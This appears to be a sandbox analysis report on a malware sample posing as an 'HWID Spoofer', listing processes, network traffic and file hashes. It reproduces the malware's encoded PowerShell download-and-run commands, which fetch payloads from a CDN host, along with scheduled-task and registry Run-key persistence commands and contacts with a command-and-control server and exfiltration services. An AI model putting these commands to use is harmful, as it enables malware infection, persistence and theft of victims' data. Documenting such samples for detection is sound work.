PID 2980 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2980 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2980 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1596 wrote to memory of 3708 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\JFUEOCN2.exe
PID 1596 wrote to memory of 3708 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\JFUEOCN2.exe
PID 1596 wrote to memory of 3708 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\JFUEOCN2.exe
PID 4600 wrote to memory of 2324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\b80jkhkdsa23kjlkh2.exe

Processes

C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr

"C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr" /S

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\KOAW3yBMbE.sln

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\QTs856dGDI.exe

C:\Users\Admin\AppData\Local\Temp\QTs856dGDI.exe

C:\Users\Admin\AppData\Local\Temp\QTs856dGDI.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\Vozc9zcB7p.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAcwBrACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGkAbQBnADIALgBnAHUAaQBsAGQAZQBkAGMAZABuAC4AYwBvAG0ALwBDAG8AbgB0AGUAbgB0AE0AZQBkAGkAYQBHAGUAbgBlAHIAaQBjAEYAaQBsAGUAcwAvAGYAOAAyAGMAZgA2ADIAZQAzADYAMQA0ADIANQBhAGQANwBmADcAYQBiAGQANAA4ADgAYwA1ADgANgAyADUAZQAtAEYAdQBsAGwALgB6AGkAcAAnACwAIAA8ACMAbQBiAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB4AG4AdQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBjAHMAcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBiADgAMAAyADMAawBqAGwAawBoADIALgBlAHgAZQAnACkAKQA8ACMAZABtAHQAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdgBnAGkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGUAZQByACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGIAOAAwADIAMwBrAGoAbABrAGgAMgAuAGUAeABlACcAKQA8ACMAbQB1AHUAIwA+AA=="

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\wLPvLxKrv4.exe

C:\Users\Admin\AppData\Local\Temp\wLPvLxKrv4.exe

C:\Users\Admin\AppData\Local\Temp\wLPvLxKrv4.exe

C:\Users\Admin\AppData\Local\Temp\Vozc9zcB7p.exe

C:\Users\Admin\AppData\Local\Temp\Vozc9zcB7p.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\aVlC89lR9F.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\NscvTD3b58.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAdwBtACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AaQBtAGcAMgAuAGcAdQBpAGwAZABlAGQAYwBkAG4ALgBjAG8AbQAvAEMAbwBuAHQAZQBuAHQATQBlAGQAaQBhAEcAZQBuAGUAcgBpAGMARgBpAGwAZQBzAC8ANAA0AGIAOQA3ADYAMQAzAGMAZQBmAGQAOAA3ADgAZgBhAGMAMgA4ADQANQA5ADEANwA0AGQAMwAxADYAZAA0AC0ARgB1AGwAbAAuAHoAaQBwACcALAAgADwAIwBjAGEAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG0AYQBsACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAG0AbABnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGIAOAAwAGoAawBoAGsAZgBkAGQAYQAyADMAawBqAGwAawBoADIALgBlAHgAZQAnACkAKQA8ACMAcQBnAG4AIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYQBxAGcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAbgBtACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGIAOAAwAGoAawBoAGsAZgBkAGQAYQAyADMAawBqAGwAawBoADIALgBlAHgAZQAnACkAPAAjAHQAYQBmACMAPgA="

C:\Users\Admin\AppData\Local\Temp\aVlC89lR9F.exe

C:\Users\Admin\AppData\Local\Temp\aVlC89lR9F.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAcABjACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADkAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AaQBtAGcAMgAuAGcAdQBpAGwAZABlAGQAYwBkAG4ALgBjAG8AbQAvAEMAbwBuAHQAZQBuAHQATQBlAGQAaQBhAEcAZQBuAGUAcgBpAGMARgBpAGwAZQBzAC8ANQBkAGEAZgA4ADEANQA3ADkANABiADAAYwBlADUAYwAzADYAMQAyAGQAMAA5ADMAMAAwAGIAMgA1ADEANwBmAC0ARgB1AGwAbAAuAHoAaQBwACcALAAgADwAIwB4AHQAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHYAYwBmACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGcAcQBpACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGIAOAAwAGoAawBoADgANwA2AHkAaABzAGQAZABhADIAMwBrAGoAbABrAGgAMgAuAGUAeABlACcAKQApADwAIwBjAG0AZQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBuAG4AagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcwBlAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYgA4ADAAagBrAGgAOAA3ADYAeQBoAHMAZABkAGEAMgAzAGsAagBsAGsAaAAyAC4AZQB4AGUAJwApADwAIwB0AHYAdAAjAD4A"

C:\Users\Admin\AppData\Local\Temp\NscvTD3b58.exe

C:\Users\Admin\AppData\Local\Temp\NscvTD3b58.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\uB9RoX6o7E.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\ci2JrYciCk.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAeAB6ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AaQBtAGcAMgAuAGcAdQBpAGwAZABlAGQAYwBkAG4ALgBjAG8AbQAvAEMAbwBuAHQAZQBuAHQATQBlAGQAaQBhAEcAZQBuAGUAcgBpAGMARgBpAGwAZQBzAC8AYwA3ADMANgAzADIAOQBmADAAZAAxAGQANgA4AGUAZgA3ADQAMgAxAGYAMQBkADAANwA1AGMANwA3AGMAMQA3AC0ARgB1AGwAbAAuAHoAaQBwACcALAAgADwAIwBtAGoAaAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGYAeAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHUAeAB4ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGIAOAAwAGoAawBoAGsAZABzAGEAMgAzAGsAagBsAGsAaAAyAC4AZQB4AGUAJwApACkAPAAjAGkAbAB1ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGkAdQBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAHkAYQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBiADgAMABqAGsAaABrAGQAcwBhADIAMwBrAGoAbABrAGgAMgAuAGUAeABlACcAKQA8ACMAeABhAG0AIwA+AA=="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAdABmACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AaQBtAGcAMgAuAGcAdQBpAGwAZABlAGQAYwBkAG4ALgBjAG8AbQAvAEMAbwBuAHQAZQBuAHQATQBlAGQAaQBhAEcAZQBuAGUAcgBpAGMARgBpAGwAZQBzAC8ANwA2ADMAMAA4ADAAZQBhADQANQAyAGYAZQA1ADIAMABiAGQAOABlADIANgBhAGMAMAA2AGYAZgBlADMAYgA0AC0ARgB1AGwAbAAuAHoAaQBwACcALAAgADwAIwByAHIAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHgAawBsACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGgAZwB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGIAOAAwAGoAawBoAGsAZgBkAGQAYQBzAGEAMgAzAGsAagBsAGsAaAAyAC4AZQB4AGUAJwApACkAPAAjAGkAagBsACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGgAeQByACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBoAGsAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBiADgAMABqAGsAaABrAGYAZABkAGEAcwBhADIAMwBrAGoAbABrAGgAMgAuAGUAeABlACcAKQA8ACMAdABlAGMAIwA+AA=="

C:\Users\Admin\AppData\Local\Temp\ci2JrYciCk.exe

C:\Users\Admin\AppData\Local\Temp\ci2JrYciCk.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGkAbQBnADIALgBnAHUAaQBsAGQAZQBkAGMAZABuAC4AYwBvAG0ALwBDAG8AbgB0AGUAbgB0AE0AZQBkAGkAYQBHAGUAbgBlAHIAaQBjAEYAaQBsAGUAcwAvADEANQA2ADcANAA2ADAAZgA3AGQAOQAxADUANwAyADAANgBkADIANwA0AGYANABlADQAMwBhAGQAYgAzADMANAAtAEYAdQBsAGwALgB6AGkAcAAnACwAIAA8ACMAdQB5AG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBhAG4AcgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBsAGkAaAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBKAEYAVQBFAE8AQwBOADIALgBlAHgAZQAnACkAKQA8ACMAZQBxAG0AIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgBjAHYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGwAeABmACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEoARgBVAEUATwBDAE4AMgAuAGUAeABlACcAKQA8ACMAaQBxAGEAIwA+AA=="

C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe

"C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \F2g3 /tr "C:\Users\Admin\AppData\Roaming\F2g3\F2g3.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \F2g3 /tr "C:\Users\Admin\AppData\Roaming\F2g3\F2g3.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'F2g3';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'F2g3' -Value '"C:\Users\Admin\AppData\Roaming\F2g3\F2g3.exe"' -PropertyType 'String'

C:\Users\Admin\AppData\Local\Temp\JFUEOCN2.exe

"C:\Users\Admin\AppData\Local\Temp\JFUEOCN2.exe"

C:\Users\Admin\AppData\Local\Temp\b80jkhkdsa23kjlkh2.exe

"C:\Users\Admin\AppData\Local\Temp\b80jkhkdsa23kjlkh2.exe"

C:\Users\Admin\AppData\Local\Temp\b80jkhkfddasa23kjlkh2.exe

"C:\Users\Admin\AppData\Local\Temp\b80jkhkfddasa23kjlkh2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1376 -ip 1376

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 768

C:\Windows\System32\sihclient.exe

C:\Windows\System32\sihclient.exe /cv BYEBNlyhtUKPqNCgpKVhng.0.2

C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe

"C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe"

C:\Users\Admin\AppData\Local\Temp\b80jkhkfdda23kjlkh2.exe

"C:\Users\Admin\AppData\Local\Temp\b80jkhkfdda23kjlkh2.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \Gbn1 /tr "C:\Users\Admin\AppData\Roaming\Gbn1\Gbn1.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Gbn1';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Gbn1' -Value '"C:\Users\Admin\AppData\Roaming\Gbn1\Gbn1.exe"' -PropertyType 'String'

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \Gbn1 /tr "C:\Users\Admin\AppData\Roaming\Gbn1\Gbn1.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "chcp"

C:\Windows\SysWOW64\chcp.com

chcp

C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe

"C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\siikebuhzwkefoct" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1912 --field-trial-handle=1916,i,8185326580353422707,9685558384079477453,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe

"C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\siikebuhzwkefoct" --mojo-platform-channel-handle=2168 --field-trial-handle=1916,i,8185326580353422707,9685558384079477453,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Users\Admin\AppData\Local\Temp\b80jkh876yhsdda23kjlkh2.exe

"C:\Users\Admin\AppData\Local\Temp\b80jkh876yhsdda23kjlkh2.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Users\Admin\AppData\Local\Temp\b80jkhkdsa23kjlkh2.exe

C:\Users\Admin\AppData\Local\Temp\b80jkhkdsa23kjlkh2.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 textbin.net udp
US 148.72.177.212:443 textbin.net tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 rentry.co udp
FR 164.132.58.105:443 rentry.co tcp
US 8.8.8.8:53 212.177.72.148.in-addr.arpa udp
US 8.8.8.8:53 3.181.190.20.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 233.130.159.162.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 105.58.132.164.in-addr.arpa udp
US 8.8.8.8:53 img2.guildedcdn.com udp
US 18.155.145.20:443 img2.guildedcdn.com tcp
US 18.155.145.20:443 img2.guildedcdn.com tcp
US 18.155.145.20:443 img2.guildedcdn.com tcp
US 8.8.8.8:53 20.145.155.18.in-addr.arpa udp
US 18.155.145.20:443 img2.guildedcdn.com tcp
US 18.155.145.20:443 img2.guildedcdn.com tcp
US 18.155.145.20:443 img2.guildedcdn.com tcp
US 18.155.145.20:443 img2.guildedcdn.com tcp
US 8.8.8.8:53 195.233.44.23.in-addr.arpa udp
US 18.155.145.20:443 img2.guildedcdn.com tcp
US 18.155.145.20:443 img2.guildedcdn.com tcp
US 18.155.145.20:443 img2.guildedcdn.com tcp
NL 20.31.169.57:443 tcp
TR 46.1.103.124:2341 tcp
US 18.155.145.20:443 img2.guildedcdn.com tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 18.155.145.20:443 img2.guildedcdn.com tcp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.200.4:443 www.google.com tcp
US 8.8.8.8:53 4.200.250.142.in-addr.arpa udp
TR 46.1.103.124:9371 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 143.67.20.104.in-addr.arpa udp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:443 dns.google tcp
US 18.155.145.20:443 img2.guildedcdn.com tcp
TR 46.1.103.124:2341 tcp
US 8.8.8.8:53 api.gofile.io udp
US 8.8.8.8:53 api.telegram.org udp
FR 51.38.43.18:443 api.gofile.io tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 store3.gofile.io udp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
FR 31.14.70.244:443 store3.gofile.io tcp
US 34.117.186.192:443 ipinfo.io tcp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 18.43.38.51.in-addr.arpa udp
US 8.8.8.8:53 232.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 244.70.14.31.in-addr.arpa udp
TR 46.1.103.124:9371 tcp
US 8.8.8.8:53 210.178.17.96.in-addr.arpa udp
TR 46.1.103.124:2341 tcp
TR 46.1.103.124:9371 tcp
TR 46.1.103.124:2341 tcp
TR 46.1.103.124:9371 tcp
TR 46.1.103.124:2341 tcp
TR 46.1.103.124:9371 tcp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
TR 46.1.103.124:2341 tcp
TR 46.1.103.124:9371 tcp
TR 46.1.103.124:2341 tcp
TR 46.1.103.124:9371 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
TR 46.1.103.124:2341 tcp
TR 46.1.103.124:9371 tcp
US 8.8.8.8:53 85.65.42.20.in-addr.arpa udp
TR 46.1.103.124:2341 tcp
TR 46.1.103.124:9371 tcp
TR 46.1.103.124:2341 tcp

Files

memory/5064-0-0x00007FF6F7E30000-0x00007FF6F7F94000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\KOAW3yBMbE.sln

MD5 7d447e1ef857ddf5640f2456f2d29e92
SHA1 60131aa77dea336e77892edbf2531c443fbb62e6
SHA256 6a14a1c978a93731c379357248807f069795e1bebb0e0166bccc57a2c5c2559f
SHA512 f02199eea81e1e9c7f3cd1f6c3df9690650b4a43720e1a560099cb15ed6bf8498a2871c8a9130afc30ac58ee6b8c777e2a94c02444b6574555cfdf1129fa8c4d

C:\Users\Admin\AppData\Local\Temp\QTs856dGDI.exe

MD5 f06bf63ed6fac19600bdec659830ecd4
SHA1 5e1388dc5be77be8c3f9b8ddeb62ea3efcc3dc4c
SHA256 3978d7c24058277c035d86a8c90d86088296363d116f1be9bae582e619936b01
SHA512 a41d41faf69d57084c3f5f43618443047bbf41e8f7868c9215b8cef3492390f1bdf754a499d77b09c4530adc1a2b2f1e871adde3c72ccd4f56d41c6c0da32605

memory/3912-8-0x0000000000480000-0x0000000000488000-memory.dmp

memory/3912-10-0x00007FFFBECD0000-0x00007FFFBF791000-memory.dmp

memory/3912-13-0x00007FFFBECD0000-0x00007FFFBF791000-memory.dmp

memory/4944-21-0x0000000000A60000-0x0000000000A68000-memory.dmp

memory/1064-20-0x00000000003B0000-0x00000000003B8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\wLPvLxKrv4.exe

MD5 6cb6c698d53c178727d4c4299c105dbe
SHA1 789f07d0f52581a02be7f497657ed8894f671fa8
SHA256 8a07ee9f5ee2ca63568a7668e85f65520da0a5dd94cc7effa2cd22e10b33fd16
SHA512 27cc4aa468616b865bbd8c3115b88f7ae11f7d7b266e0468abb1b4dc9209797855b93e38338b63ae1e27ae703d4214f6d55ef0ba6a1e36809df824d3ed9d3f0d

C:\Users\Admin\AppData\Local\Temp\Vozc9zcB7p.exe

MD5 a5eb0994d01573048175133608708c49
SHA1 5bc469c18812cf70f403a0e429dcbc57d16bd89b
SHA256 d5de47473170b06397d419fe05946e70d633ce1de1c493e967d6010ad651ca0a
SHA512 a31b705befc391e9d4a999da20515f9903aa8922fe3cd35869380145e7a89b5ca4395bbc7da654f01c424abd26b77f821b28be72440063411bc8c209424cc5fc

memory/1064-23-0x00007FFFBEDF0000-0x00007FFFBF8B1000-memory.dmp

memory/4944-24-0x00007FFFBEDF0000-0x00007FFFBF8B1000-memory.dmp

memory/4824-25-0x000001F586B60000-0x000001F586B70000-memory.dmp

memory/4824-27-0x000001F586B60000-0x000001F586B70000-memory.dmp

memory/4824-28-0x00007FFFBEDF0000-0x00007FFFBF8B1000-memory.dmp

memory/4824-35-0x000001F5A0ED0000-0x000001F5A0EF2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d004nlyt.zpo.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4944-41-0x00007FFFBEDF0000-0x00007FFFBF8B1000-memory.dmp

memory/1064-42-0x00007FFFBEDF0000-0x00007FFFBF8B1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\aVlC89lR9F.exe

MD5 282c4bb41487f90e4c9b08aa11b125f8
SHA1 c26ad88a5a9af4a500ea58a0e135b652fabeebcd
SHA256 0f2bf570499bbfe78f887fe245508f6c3a324b7def653007913d6ccf469a74dd
SHA512 1292e47f81443d9692f586aadcf716f602605b146aa25ee624d7370183ef37712f6518d986f8d23ed0fcb77c5c285d78a143f96334d51e6bdf2c74d15bbe1007

memory/3448-47-0x0000000000620000-0x0000000000628000-memory.dmp

memory/1928-50-0x0000000000FB0000-0x0000000000FB8000-memory.dmp

memory/3448-51-0x00007FFFBEDF0000-0x00007FFFBF8B1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\NscvTD3b58.exe

